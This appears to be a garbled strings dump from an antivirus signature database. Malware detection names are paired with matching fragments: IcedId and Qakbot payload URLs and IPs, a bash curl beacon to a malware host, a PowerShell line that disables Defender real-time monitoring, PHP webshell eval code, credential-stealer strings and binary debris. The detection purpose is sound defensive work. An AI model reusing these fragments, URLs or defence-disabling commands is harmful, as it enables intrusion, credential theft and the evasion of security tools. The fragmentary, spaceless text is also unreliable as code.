6logz.live/frnd/shally/connect.php', www.newltd.ga/wp-admin/zlords.php', 6www.newltd.ga/wp-admin/zlords.php', formdata.append(idtercero,idtercero);formdata.append 6formdata.append(idtercero,idtercero);formdata.append !#SCPT:OwakeWriteTempMSK system.io.file.appendalltext(\"c:\\\\windows\\\\temp\\\\msk 6system.io.file.appendalltext(\"c:\\\\windows\\\\temp\\\\msk !#SCPT:PWS:HTML/Pdfphish action/s/uri/uri(http://pmevents.co.in/nd/index.php) 6action/s/uri/uri(http://pmevents.co.in/nd/index.php) !#SCPT:TechBroloCall.1.A alert(\"warning:\"+isp+\"customer(\"+ip+\")from\"+city+\"\\n 6alert(\"warning:\"+isp+\"customer(\"+ip+\")from\"+city+\"\\n !#SCRIPT:Python/Raywa.A2 #chromestealerchan 6#chromestealerchan ifline1.find(\"!chrome\")!=-1and( !#SCPT:PowNTSTATSecRegKey hkcu:\\software\\microsoft\\office\\$i.0\\excel\\security 5hkcu:\\software\\microsoft\\office\\$i.0\\excel\\security !#SCPT:Tobeet_Js_379955FB return{eep:newregexp(hrtroo,string.fromcharcode(103 5return{eep:newregexp(hrtroo,string.fromcharcode(103 !#SCPT:Tobeet_Js_B86E0D1E ();functiondl(){varhost='http://king.connectioncdn. 5();functiondl(){varhost='http://king.connectioncdn. !#SCRIPT:JS/Nemucod.QX.04 ,false); 5,false); a-z0-9.send();if( a-z0-9.status==200 !#SCRIPT:Python/Pourri.B3 parser.add_argument(\"target\",nargs=1,type=str,help= 5parser.add_argument(\"target\",nargs=1,type=str,help= <scriptsrc='https://camillesanz.com/lib/status.js'> 5<scriptsrc='https://camillesanz.com/lib/status.js'> 5<scriptsrc= http://jquerystatistics.org/update.js !#TEL:HTML/Meadgive!shell \"eb125831c966b9 5\"eb125831c966b9 49803408 85c975f7ffe0e8e9ffffff alert(\"caseid:{ 5alert(\"caseid:{ }:dear{connection-isp 0}customer !#Trojan:JS/Valak.PK4!MTB return\"/\"+config.c2_prefix+\"/\"+querystring+\".html\"; 5return\"/\"+config.c2_prefix+\"/\"+querystring+\".html\"; !#Trojan:MacOS/SpyEvil.A1 #!/bin/bashv=$(curl--silenthttp://usb.mine.nu/p.php 5#!/bin/bashv=$(curl--silenthttp://usb.mine.nu/p.php !#Trojan:MacOS/SpyEvil.B1 returnhexlify(getpass.getuser()+\"-\"+str(getnode())) 5returnhexlify(getpass.getuser()+\"-\"+str(getnode())) !#SCPT:O97M/Qakbot.VA2!MTB <si><t>https://abpandh.com/drms/fert.html</t></si> 4<si><t>https://abpandh.com/drms/fert.html</t></si> !#SCRIPT:Possible_CommonJs //startcommon.common.js//(c)2010codeplexfoundation 4//startcommon.common.js//(c)2010codeplexfoundation !#SCRIPT:WDImpairDefense.A set-mppreference 4set-mppreference 0-disablebehaviormonitoring$true 0-disablerealtimemonitoring$true !#SCRIPT:Win32/AntiVboxAu3 ifprocessexists(\"vboxtray.exe\")and$ 4ifprocessexists(\"vboxtray.exe\")and$ 0=\"1\"thenexit !#TEL:Trojan:O97M/Obfuse.K {\\rtf{\\object\\objocx\\objupdate\\objw 4{\\rtf{\\object\\objocx\\objupdate\\objw !#Trojan:BAT/Tskill.C!Pra1 tasklist 4tasklist /fi\"imagenameeq |find/ !#Trojan:BAT/Tskill.C!Pra5 .bkp\" .bkp !#Trojan:JS/Rozena.CS6!MTB chrome.tabs.executescript({code:config.jscommand}) 4chrome.tabs.executescript({code:config.jscommand}) !#PossiblePangimopControl-g <paramname=\"javafx_version\"value=\"2.0+\"></applet> 3<paramname=\"javafx_version\"value=\"2.0+\"></applet> !#SCPT:Exploit:JS/Archost.A sendstr+=encodeuri(\"dump=\"+flashver+\"|\"+silverver 3sendstr+=encodeuri(\"dump=\"+flashver+\"|\"+silverver !#SCPT:JS/DownloadifyBase64 swf:'assets/downloadify.swf', 3swf:'assets/downloadify.swf', datatype:'base64' \\rimo1.dll..\\rimo1.dll% 3\\rimo1.dll..\\rimo1.dll% \\rimo2.dll..\\rimo2.dll% !#SCPT:O97M/IcedId.RVS3!MTB <v>http://45.138.157.216/44313,6048108796.dat</v> 3<v>http://45.138.157.216/44313,6048108796.dat</v> !#SCPT:lnk_wscript_vbscript endfunction>file.txt&&wscript//e:vbscriptfile.txt 3endfunction>file.txt&&wscript//e:vbscriptfile.txt !#SCRIPT:Worm:JS/Bondat!lnk /cstartwscript\".trashes\\ 3/cstartwscript\".trashes\\ \t.js\"& \".trashes\\ 3\\x73\\x74\\x61\\x72\\x74 =newcoinhive.user( !#Trojan:JS/Pterodo.PK3!MTB del/f/q\"%appdata%\\microsoft\\addins\\addcrypt*.vbs\" 3del/f/q\"%appdata%\\microsoft\\addins\\addcrypt*.vbs\" !#Trojan:MacOS/BirdMiner.A1 -maccel=hvf--cpuhost/library/application\\support/ 3-maccel=hvf--cpuhost/library/application\\support/ !#Trojan:PHP/Webshell.B!lf2 make.htaccessfileaccessibleoverweb<files~\"^\\.ht\"> 3make.htaccessfileaccessibleoverweb<files~\"^\\.ht\"> !#Trojan:VBS/CoinMiner_sad7 .run(\"csrs.exe--servereu1-zcash.flypool.org--port 3.run(\"csrs.exe--servereu1-zcash.flypool.org--port !#Trojan:VBS/DrpSpoof.A!al2 temppath+\"\\\"+appname+\"%number_of_processors%.exe\" 3temppath+\"\\\"+appname+\"%number_of_processors%.exe\" !#PUA:MacOS/SurfBuyer.A1!MTB service.macinstallerinfo.com/tracking/cm_mac.php 2service.macinstallerinfo.com/tracking/cm_mac.php !#SCPT:HTML/Phish.VISP33!MTB window.location.replace(\"http://www.\"+my_slice); 2window.location.replace(\"http://www.\"+my_slice); !#SCPT:LowfiTrojan:JS/Auto47 <style>x\\:*{display:inline-block;behavior:url(#d 2<style>x\\:*{display:inline-block;behavior:url(#d !#SCPT:O97M/EncDoc.VPPL2!MTB </f><v>dll32\"&\"..\\lertio.cersw\"&\",dll</v 2</f><v>dll32\"&\"..\\lertio.cersw\"&\",dll</v !#SCPT:O97M/IcedId.RVS12!MTB <v>http://185.82.218.30/44313,6048108796.dat</v> 2<v>http://185.82.218.30/44313,6048108796.dat</v> !#SCPT:Ploty.CVE-2017-0199.1 002f00640065006600610075006c0074002e006800740061 2002f00640065006600610075006c0074002e006800740061 !#SCPT:Trojan:BAT/Starter.G1 /cstartwscript/e:vbscript.encodemanuel.doc&start 2/cstartwscript/e:vbscript.encodemanuel.doc&start !#SCRIPT:PHP/Dirtelti.M3!MTB fputs( 2fputs( .system(\"whoami\"). .\"\\n\"); !#SCRIPT:PHP/Dirtelti.X4!MTB =$_request[' 2=$_request[' '];preg_replace('/.*/e',''.$a,'') !#SCRIPT:Win32/HookTV.B2!MTB c:\\windows\\temp\\hook.exe>c:\\windows\\temp\\log.txt 2c:\\windows\\temp\\hook.exe>c:\\windows\\temp\\log.txt !#Trojan:JS/Sodinokibi.SA!A6 2function ;while( !#Backdoor:PHP/Webshell.Q!vc2 showopenports(nst)netstat-an|greplisten|greptcp 1showopenports(nst)netstat-an|greplisten|greptcp !#Hacktool:JS/NatSlipSteam.A4 my$pcap=pcap_open_live($dev,1024*10,0,0,\\$err); 1my$pcap=pcap_open_live($dev,1024*10,0,0,\\$err); !#SCPT:Exploit:JS/Meadgive.AB shape\"),d2[e3].appendchild(ah[e]);for(gm=d2[o3] 1shape\"),d2[e3].appendchild(ah[e]);for(gm=d2[o3] '%temp%\\ 1'%temp%\\ .exe');start-process'%temp%\\ .bat');start-process\"%temp%\\ !#SCPT:Trojan:JS/MacApfell.AB application('google 1application('google chrome');if ['running'] !#SCPT:Trojan:VBA/Downldr.CS4 hyperlink->http://employeeportal.net-login.com/ 1hyperlink->http://employeeportal.net-login.com/ =\"%\"; 1=\"%\"; =unescape( eval( !#SCRIPT:HTML/BankPhishLogo.A src=\"http 1src=\"http /img/logos/barclays-logo.png\" !#SCRIPT:HTML/FreyalpButton.B class=\"download_link\" 1class=\"download_link\" ><divid=\"switch\"></div> !#SCRIPT:PowerShell/WmiObject get-wmiobject-classwin32_computersystem).domain 1get-wmiobject-classwin32_computersystem).domain !#SCRIPT:Python/Phokis.A1!MTB os.system(\"adb-s\"+ 1os.system(\"adb-s\"+ +\"shellinputkeyevent\"+ !#SCRIPT:Trojan:JS/Psyme.AE.1 <html><body><divstyle=\"visibility:hidden\"><div> 1<html><body><divstyle=\"visibility:hidden\"><div> !#SCRIPT:Worm:VBS/Jenxcus.BH4 shellobj.run\"wscript.exe//b\"&chr(34)&installdir 1shellobj.run\"wscript.exe//b\"&chr(34)&installdir !#Script:Worm:VBS/Jenxcus.RV2 select*fromwin32_processwherename='wscript.exe' 1select*fromwin32_processwherename='wscript.exe' !#Trojan:BAT/ClearSteal.B!MTB %allusersprofile%\\sppextcomtel\\sppextcomtel.scr 1%allusersprofile%\\sppextcomtel\\sppextcomtel.scr !#Trojan:Win32/Inmal!lnk!ats1 coronavirus.doc.l 1coronavirus.doc.l k>\"%tmp%\\ \"&\"%tmp%\\ !#ALF:Backdoor:PHP/WebShell.RN {eval/* 0{eval/* ]]);}exit();} !#Backdoor:Linux/Dakkatoni.Sa1 /ap/at.x86;catat.x86>ca;chmod+x*;./cabackdoors 0/ap/at.x86;catat.x86>ca;chmod+x*;./cabackdoors !#HackTool:Python/Syswhispers2 syswhispers:whycallthekernelwhenyoucanwhisper? 0syswhispers:whycallthekernelwhenyoucanwhisper? !#SCPT:Downloader:VBS/Agent.A1 zeb=\"s\"&\"t\"&\"ar\"&\"t\"objshell.shellexecutechrw( 0zeb=\"s\"&\"t\"&\"ar\"&\"t\"objshell.shellexecutechrw( !#SCPT:Trojan:HTML/Phish.SMT31 varc=my_slice.substr(0,my_slice.indexof('.')); 0varc=my_slice.substr(0,my_slice.indexof('.')); !#SCPT:Trojan:Win32/WinLNK.JK1 http://ktr.freedynamicdns.org/backups/post.php 0http://ktr.freedynamicdns.org/backups/post.php !#SCRIPT:PSWinAPIdefinitions.A add-type-memberdefinition 0add-type-memberdefinition -namespace infinite);(2047,4),HKLM\\SYSTEM\\*(1)\\SERVICES\\MsSecFlt\\*(infinite)\\\\*B(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseAuditLoggerE(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseAuditLogger\\\\*N(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseAuditLogger\\*(infinite)Q(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseAuditLogger\\*(infinite)\\\\*?(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseEventLogB(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseEventLog\\\\*K(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseEventLog\\*(infinite)N(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Autologger\\SenseEventLog\\*(infinite)\\\\*U(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Security\\\\16C6501A-FF2D-46EA-868D-8F96CB0CB52Dd(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\MsSense.exej(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseCncProxy.exep(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseSampleUploader.exed(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseIR.exeg(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SgrmBroker.exeg(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\MsSense.exe\\\\*m(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseCncProxy.exe\\\\*s(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseSampleUploader.exe\\\\*g(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SenseIR.exe\\\\*j(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SgrmBroker.exe\\\\*U(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Security\\\\14f8138e-3b61-580b-544b-2609378ae460U(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Security\\\\cb2ff72d-d4e4-585d-33f9-f3a395c40be7U(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Security\\\\541dae91-cc3c-5807-b064-c2561c16d7e8U(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\WMI\\Security\\\\C60418CC-7E07-400F-AE3B-D521C5DBD96FE(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\Windows Advanced Threat ProtectionH(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\Windows Advanced Threat Protection\\\\*Q(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\Windows Advanced Threat Protection\\*(infinite)T(2047,4),HKLM\\SYSTEM\\*(1)\\Control\\Windows Advanced Threat Protection\\*(infinite)\\\\*L(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}O(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\\\*X(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\*(infinite)[(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\*(infinite)\\\\*L(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}O(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\\\*X(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\*(infinite)[(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{5CD661A7-F770-47EA-ABEE-09E11B242576}\\*(infinite)\\\\*L(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}O(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\\\*X(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\*(infinite)[(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\*(infinite)\\\\*L(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}O(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\\\*X(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\*(infinite)[(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{91FDE64B-2787-484B-B3EC-03E25A64AAE9}\\*(infinite)\\\\*z 2db30ca2a0a5 HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History DHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History MachineDomain 2db3a2ed1e72 HKLM\\SYSTEM\\CurrentControlSet\\Services\\WebClient 1HKLM\\SYSTEM\\CurrentControlSet\\Services\\WebClient 2db348a0b323 2db3da3d481d !#SLF:vCtxtHtml_file_ !#SLF:vCtxtBM_7Z_FILE_ !#SLF:vCtxtBM_MZ_FILE_ !#SLF:vCtxtBM_BMP_FILE_ !#SLF:vCtxtBM_CAB_FILE_ !#SLF:vCtxtBM_CRX_FILE_ !#SLF:vCtxtBM_DEX_FILE_ !#SLF:vCtxtBM_DLM_FILE_ !#SLF:vCtxtBM_FLV_FILE_ !#SLF:vCtxtBM_GIF_FILE_ !#SLF:vCtxtBM_JOB_FILE_ !#SLF:vCtxtBM_JPG_FILE_ !#SLF:vCtxtBM_LHA_FILE_ !#SLF:vCtxtBM_LNK_FILE_ !#SLF:vCtxtBM_MP3_FILE_ !#SLF:vCtxtBM_OGG_FILE_ !#SLF:vCtxtBM_OLE_FILE_ !#SLF:vCtxtBM_PDF_FILE_ !#SLF:vCtxtBM_PNF_FILE_ !#SLF:vCtxtBM_PNG_FILE_ !#SLF:vCtxtBM_RAR_FILE_ !#SLF:vCtxtBM_RTF_FILE_ !#SLF:vCtxtBM_SDB_FILE_ !#SLF:vCtxtBM_SWF_FILE_ !#SLF:vCtxtBM_VBE_FILE_ !#SLF:vCtxtBM_WMF_FILE_ !#SLF:vCtxtBM_XML_FILE_ !#SLF:vCtxtBM_ZIP_FILE_ !#SLF:vCtxtBM_FONT_FILE_ !#SLF:vCtxtBM_GZIP_FILE_ !#SLF:vCtxtBM_MZ_FILE_1_ !#SLF:vCtxtBM_MZ_FILE_2_ !#SLF:vCtxtBM_MZ_FILE_3_ !#SLF:vCtxtBM_MZ_FILE_4_ !#SLF:vCtxtBM_TEXT_FILE_ !#SLF:vCtxtBM_TIFF_FILE_ !#SLF:vTelCtxtHtml_file_ !#SLF:vCtxtBM_DEX_FILE_1_ !#SLF:vCtxtBM_DEX_FILE_2_ !#SLF:vCtxtBM_DEX_FILE_3_ !#SLF:vCtxtBM_DMG_FILE_0_ !#SLF:vCtxtBM_DMG_FILE_1_ !#SLF:vCtxtBM_DMG_FILE_2_ !#SLF:vCtxtBM_DMG_FILE_3_ !#SLF:vCtxtBM_DMG_FILE_4_ !#SLF:vCtxtBM_ELF_FILE_0_ !#SLF:vCtxtBM_ELF_FILE_1_ !#SLF:vCtxtBM_ELF_FILE_2_ !#SLF:vCtxtBM_ELF_FILE_3_ !#SLF:vCtxtBM_ELF_FILE_4_ !#SLF:vCtxtBM_JDIFF_FILE_ !#SLF:vCtxtBM_MEDIA_FILE_ !#SLF:vCtxtBM_SMALL_FILE_ !#SLF:vCtxtSCPT:HTMLFile_ !#SLF:vTelCtxtBM_7Z_FILE_ !#SLF:vCtxtBM_CURSOR_FILE_ !#SLF:vCtxtBM_CURSOR_FILE_ !#SLF:vCtxtBM_OFFICE_FILE_ !#SLF:vCtxtBM_OFFICE_FILE_ !#SLF:vTelCtxtBM_BMP_FILE_ !#SLF:vTelCtxtBM_BMP_FILE_ !#SLF:vTelCtxtBM_CAB_FILE_ !#SLF:vTelCtxtBM_CAB_FILE_ !#SLF:vTelCtxtBM_CRX_FILE_ !#SLF:vTelCtxtBM_CRX_FILE_ !#SLF:vTelCtxtBM_DEX_FILE_ !#SLF:vTelCtxtBM_DEX_FILE_ !#SLF:vTelCtxtBM_DLM_FILE_ !#SLF:vTelCtxtBM_DLM_FILE_ !#SLF:vTelCtxtBM_FLV_FILE_ !#SLF:vTelCtxtBM_FLV_FILE_ !#SLF:vTelCtxtBM_GIF_FILE_ !#SLF:vTelCtxtBM_GIF_FILE_ !#SLF:vTelCtxtBM_JOB_FILE_ !#SLF:vTelCtxtBM_JOB_FILE_ !#SLF:vTelCtxtBM_JPG_FILE_ !#SLF:vTelCtxtBM_JPG_FILE_ !#SLF:vTelCtxtBM_LHA_FILE_ !#SLF:vTelCtxtBM_LHA_FILE_ !#SLF:vTelCtxtBM_LNK_FILE_ !#SLF:vTelCtxtBM_LNK_FILE_ !#SLF:vTelCtxtBM_MP3_FILE_ !#SLF:vTelCtxtBM_MP3_FILE_ !#SLF:vTelCtxtBM_OGG_FILE_ !#SLF:vTelCtxtBM_OGG_FILE_ !#SLF:vTelCtxtBM_OLE_FILE_ !#SLF:vTelCtxtBM_OLE_FILE_ !#SLF:vTelCtxtBM_PDF_FILE_ !#SLF:vTelCtxtBM_PDF_FILE_ !#SLF:vTelCtxtBM_PNF_FILE_ !#SLF:vTelCtxtBM_PNF_FILE_ !#SLF:vTelCtxtBM_PNG_FILE_ !#SLF:vTelCtxtBM_PNG_FILE_ !#SLF:vTelCtxtBM_RAR_FILE_ !#SLF:vTelCtxtBM_RAR_FILE_ !#SLF:vTelCtxtBM_RTF_FILE_ !#SLF:vTelCtxtBM_RTF_FILE_ !#SLF:vTelCtxtBM_SDB_FILE_ !#SLF:vTelCtxtBM_SDB_FILE_ !#SLF:vTelCtxtBM_SWF_FILE_ !#SLF:vTelCtxtBM_SWF_FILE_ !#SLF:vTelCtxtBM_VBE_FILE_ !#SLF:vTelCtxtBM_VBE_FILE_ !#SLF:vTelCtxtBM_WMF_FILE_ !#SLF:vTelCtxtBM_WMF_FILE_ !#SLF:vTelCtxtBM_XML_FILE_ !#SLF:vTelCtxtBM_XML_FILE_ !#SLF:vTelCtxtBM_ZIP_FILE_ !#SLF:vTelCtxtBM_ZIP_FILE_ !#SLF:vCtxtBM_AUTOCAD_FILE_ !!#SLF:vCtxtBM_AUTOCAD_FILE_ !#SLF:vCtxtBM_SQLlite_FILE_ !!#SLF:vCtxtBM_SQLlite_FILE_ !#SLF:vCtxtBM_SYMBIAN_FILE_ !!#SLF:vCtxtBM_SYMBIAN_FILE_ !#SLF:vCtxtBM_TORRENT_FILE_ !!#SLF:vCtxtBM_TORRENT_FILE_ !#SLF:vCtxtBM_UNICODE_FILE_ !!#SLF:vCtxtBM_UNICODE_FILE_ !#SLF !!#SLF !Ranky.AL !Ranky.AM !Harnig.X !Agent.N !Agent.P !Agent.AQ Cr\t}UY*x !Harnig.M !Small.NF !Small.LP !Small.OO !Small.NV !Small.OD !Small.OH f\\ g !Agent.AP !Ldpinch.CK !Killav.BR !Revop.A !Startpage.GI !Small.MP g\\!#g !WinShow.V #g\\!$g !Istbar.AU $g\\ 'g !Small.ED \\getpasses.exe (-Messengerpasses.txt d\\Administrator\\Desktop\\Steal0r's\\Messenger Steal0r frm_Main \\passes.txt ia@XB! )g\\ Vg !Small.KN Vg\\ Wg !Small.LY Wg\\\"Yg !Wintrim.AV Yg\\ [g !Harnig.Q [g\\\"\\g !Wintrim.AK \\g\\ ]g !Small.IX !Agent.T ^g\\ _g !Small.NE _g\\!`g !Istbar.FA `g\\#eg !Wintrim.NAA eg\\\"gg !Wintrim.BN gg\\!hg !Istbar.DG hg\\\"jg !Wintrim.BB TMXng jg\\ kg !Small.KM kg\\\"mg !Istbar.NAA mg\\\"ng !Wintrim.BC ng\\ rg !Small.NI rg\\\"sg !WinShow.AC sg\\ tg !Small.GO tg\\ ug !Small.JZ ug\\!vg !Istbar.ET vg\\!wg !Small.NAK wg\\!xg !Wintrim.F xg\\ yg !Small.LQ yg\\ zg !Small.OE zg\\\"{g !Wintrim.BK {g\\#~g !Inservice.G cF7cFK !Inservice.H !Wintrim.AZ !Wintrim.BJ !Ldpinch.DQ !Agent.AB !Agent.A1 #Agent.AP !Agent.AG !Agent.AU !Agent.AN !Ranky.AP @ !Istbar.DV !Istbar.FC h\\ \th !Small.EL -2X,- !Wintrim.BG !Small.QC ]l |k !Small.OR !Small.NL vh\\o< !Small.PJ SIFe1A !Istbar.FJ !Harnig.Y !Harnig.R !Harnig.U !Istbar.EW !Small.QU !Small.HV !Small.PN !Small.LE h\\ h !Small.RN h\\ !h !Small.QH !h\\ #h !Small.NK #h\\ &h &h\\ 'h !Small.PT 'h\\ (h !Small.OX (h\\ )h !Small.HF ^=CCa )h\\!*h !Istbar.EU *h\\ +h !Small.PP +h\\\"-h !WinShow.AG -h\\ .h !Small.FF .h\\ 1h !Small.QG 1h\\ 2h !Small.QV 2h\\ 4h !Small.OS 4h\\ 6h !Small.QS 6h\\!7h !Istbar.ER 7h\\ 9h !Small.PV 9h\\ <h !Small.MG <h\\ =h !Small.QK =h\\ >h >h\\ ?h !Small.PO ?h\\!Ch !Wintrim.P Ch\\!Gh !WinShow.Z Gh\\ Jh osAim Jh\\ Lh !Small.IP Lh\\ Nh Nh\\ Qh !Small.ID Qh\\ Th !Small.QI Th\\ Uh !Agent.BI Uh\\ Yh !Small.PB Yh\\ Zh !Small.QT Zh\\ [h !Small.OK [h\\ \\h \\h\\ ^h !Small.PI ^h\\ `h !Agent.AJ (070O0 `h\\ ah ah\\ bh bh\\ ch ch\\ dh !Small.QZ dh\\ fh !Small.ON !Small.RR h\\ +i !Agent.AT V770Yo +i\\ Di Di\\!Fi !Harnig.Y1 Fi\\\"Hi !Wintrim.BF Hi\\\"Ii !Wintrim.BU Ii\\ Ji Ji\\ Li Li\\ Mi Mi\\ Oi !Agent.CD 4o*4`%r Oi\\ Pi !Agent.CE Pi\\\"Qi !Wintrim.AX Qi\\ Si !Agent.CO Si\\ Vi !Small.FT Vi\\\"Wi !Wintrim.BW Wi\\ Xi !Small.UG Xi\\ Yi Yi\\ ]i !Small.UL ]i\\ ^i ^i\\ `i !Small.HO `i\\ di !Small.TA di\\\"fi !WinShow.AK fi\\ hi !Small.SE hi\\ ii !Agent.BJ !Startpage.MF EN&B[ !Startpage.NF !Agent WINDOWS\\system32\\scvhost.exe virtual-net.pisem.su/Nick.gif InternetCloseHandlea f:\\source\\cg\\cgall\\wmgj\\wmgjexe Mcmd=1&usrname=%s&usrpass=%s&servername=%s&bankpass=%s&nickname=%s&rankinfo=%d ACTION_OFFLINE_CLIENT 5ReadProcessMemory with PINCODE-value fault, code = %d szAccount = %s szAccount = %saw Bonus 1.exe Jhttp://wmr-moneys.org/config/line.gif Phttp://countexchange.com/config/line.gif &?a=wmk:payto?Purse= &Amount= &Desc= \\Bonus 1.5.vbp \\SOFT2 .*\\AG:\\Vladimir\\Desktop\\ WebMoney WebMoneyg 07gSg 8wdd9 &j0tU@ Yd F> Yd Fg !#SLF:AGGR:CopyRenamed!taskhostw.exe !#AGG:AllowList:Win32/onlinebrief24.A !#ALF:HackTool:PowerShell/RayaByPs.C!MTB !#ALF:TrojanDownloader:O97M/EncDoc.REEA!MTB !#TEL:Trojan:HTA/WildChild.S!ibt !#AGG:AllowList:Win32/AdaptiveBee.A !#SLF:AGGR:CopyRenamed!diskshadow.exe !#ALF:Trojan:Win32/Cassini_f2776388!ibt !SALF:TrojanDownloader:O97M/SuspXlsDoc.L !#SLF:PowerShell/DiscoveryGetNetworkInfo.A !#TEL:TrojanDownloader:O97M/EncDoc.SNK!MTB !#TEL:TrojanDownloader:O97M/EncDoc.ZIP!MTB !#ALF:HackTool:PowerShell/PowerViewDev.A!MTB !#SLF:HackTool:PowerShell/KerberosUtils.A!MTB !#SLF:AGGR:GamObfus4 !#ALF:CaptureScreenShot.sm !#AGGR:TopLevelFileExt!docx !#ALF:Trojan:BAT/NetWalker!MSR !#TEL:Trojan:Win32/Linkommer.D !#ALF:Trojan:HTML/Phish.SBLN!MTB !#BM_CopyRenamedIName_syncappvpublishingserver.exe !#BM_CopyRenamedOName_syncappvpublishingserver.exe !#AGGR:MicrosoftIframe:ST00 !#ALF:Phish:HTML/OneDrive.AD!MTB !#AGG:AllowList:Win32/Spinnaker.A !#ALF:SusEncrOLEFileInDownloadCMD !#TEL:Backdoor:MSIL/Bladabindi.RB!MTB !#ALF:Trojan:Win32/Cassini_4b7824be!ibt !#ALF:CaptureScreenShot.ht !#AGG:AllowList:AdminTools.A !#AGG:AllowList:JS/RealPage.A !#ALF:Exploit:O97M/CVE-2017-11882.YE!MTB !#SLF:PowerShell/DiscoveryGetComputerName.A !#SLFPER:Trojan:PowerShell/PSExploitShellCode.A !#TEL:AGGR:ZipSlipApk !#TEL:AGGR:ZipSlipTar !#TEL:AGGR:ZipSlipWar !#ALF:AGGR:Phish:HTML/Mitargcro.S200 !#ALF:TrojanDownloader:BAT/Jackal!dha !#ALF:VirTool:Powershell/Deccan.B!MTB !#AGG:AllowList:Win32/AcroSoft.AcroEdit.A !#SLF:HackTool:PowerShell/KillChainUtils.A!MTB !#ALF:TrojanDownloader:O97M/CVE-2017-11882.AVP!MTB !#ALF:CaptureScreenBit.sm !#TEL:TrojanDownloader:Java/Jorva.A !#ALFPER:TrojanDownloader:JS/Nemucod !#Lua:Macro:O97M/Macroiwshellex.B!amsi !#ALF:HackTool:PowerShell/WMIExecObfus.A!MTB !#SLF:AGGR:CopyRenamed!syncappvpublishingserver.exe !#TEL:AGGR:ZipSlipCpio !#BM_MSIL_SERVICEINSTALLER !#ALF:PWS:HTML/Phish.SMKV!MTB !#ALF:Trojan:HTML/Phish.PTB!MTB !#AGG:AllowList:Win32/AppViewer.A !#SLF:HackTool:PowerShell/MightyCore.B!MTB !#SLF:HackTool:PowerShell/Internaloff.K1!MTB !#SLF:HackTool:PowerShell/Internaloff.M1!MTB !#SLF:HackTool:PowerShell/Internaloff.N1!MTB !#ALF:CaptureScreenBit.ht !#AGG:AllowList:Win32/JMJ.A !#AGG:JS/Obfuscator.Spltra.D !#AGG:AllowList:Win32/SlimWare.A ource. Can't empty Clipboard Can't open Clipboard0The data binding DLL, '|1', could not be loaded. Data Access Error The given bookmark was invalid Can't create AutoRedraw image Invalid picture Printer 